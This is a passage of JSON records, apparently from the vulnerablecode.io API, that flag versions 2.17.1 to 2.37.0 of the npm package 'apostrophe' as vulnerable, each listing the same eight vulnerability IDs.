lnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.17.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268523?format=json","purl":"pkg:npm/apostrophe@2.17.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.17.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268524?format=json","purl":"pkg:npm/apostrophe@2.18.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.18.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268525?format=json","purl":"pkg:npm/apostrophe@2.18.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.18.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268526?format=json","purl":"pkg:npm/apostrophe@2.18.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.18.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268527?format=json","purl":"pkg:npm/apostrophe@2.19.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.19.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268528?format=json","purl":"pkg:npm/apostrophe@2.19.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.19.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268529?format=json","purl":"pkg:npm/apostrophe@2.20.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.20.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268530?format=json","purl":"pkg:npm/apostrophe@2.20.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.20.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268531?format=json","purl":"pkg:npm/apostrophe@2.20.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.20.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268532?format=json","purl":"pkg:npm/apostrophe@2.20.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.20.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268533?format=json","purl":"pkg:npm/apostrophe@2.21.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.21.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268534?format=json","purl":"pkg:npm/apostrophe@2.22.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.22.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268535?format=json","purl":"pkg:npm/apostrophe@2.22.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.22.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268536?format=json","purl":"pkg:npm/apostrophe@2.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268537?format=json","purl":"pkg:npm/apostrophe@2.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.23.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268538?format=json","purl":"pkg:npm/apostrophe@2.23.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.23.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268539?format=json","purl":"pkg:npm/apostrophe@2.24.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.24.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268540?format=json","purl":"pkg:npm/apostrophe@2.25.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.25.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268541?format=json","purl":"pkg:npm/apostrophe@2.25.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.25.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268542?format=json","purl":"pkg:npm/apostrophe@2.26.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.26.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268543?format=json","purl":"pkg:npm/apostrophe@2.26.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.26.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268544?format=json","purl":"pkg:npm/apostrophe@2.27.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.27.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268545?format=json","purl":"pkg:npm/apostrophe@2.27.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.27.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268546?format=json","purl":"pkg:npm/apostrophe@2.28.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.28.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268547?format=json","purl":"pkg:npm/apostrophe@2.29.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.29.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268548?format=json","purl":"pkg:npm/apostrophe@2.29.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.29.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268549?format=json","purl":"pkg:npm/apostrophe@2.29.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.29.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268550?format=json","purl":"pkg:npm/apostrophe@2.30.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.30.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268551?format=json","purl":"pkg:npm/apostrophe@2.31.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.31.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268552?format=json","purl":"pkg:npm/apostrophe@2.32.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.32.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268553?format=json","purl":"pkg:npm/apostrophe@2.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.33.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268554?format=json","purl":"pkg:npm/apostrophe@2.33.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.33.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268555?format=json","purl":"pkg:npm/apostrophe@2.34.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.34.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268556?format=json","purl":"pkg:npm/apostrophe@2.34.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.34.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268557?format=json","purl":"pkg:npm/apostrophe@2.34.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.34.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268558?format=json","purl":"pkg:npm/apostrophe@2.34.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.34.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268559?format=json","purl":"pkg:npm/apostrophe@2.35.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.35.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268560?format=json","purl":"pkg:npm/apostrophe@2.35.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.35.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268561?format=json","purl":"pkg:npm/apostrophe@2.36.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.36.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268562?format=json","purl":"pkg:npm/apostrophe@2.36.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.36.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268563?format=json","purl":"pkg:npm/apostrophe@2.36.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.36.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268564?format=json","purl":"pkg:npm/apostrophe@2.36.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.36.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268565?format=json","purl":"pkg:npm/apostrophe@2.37.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.3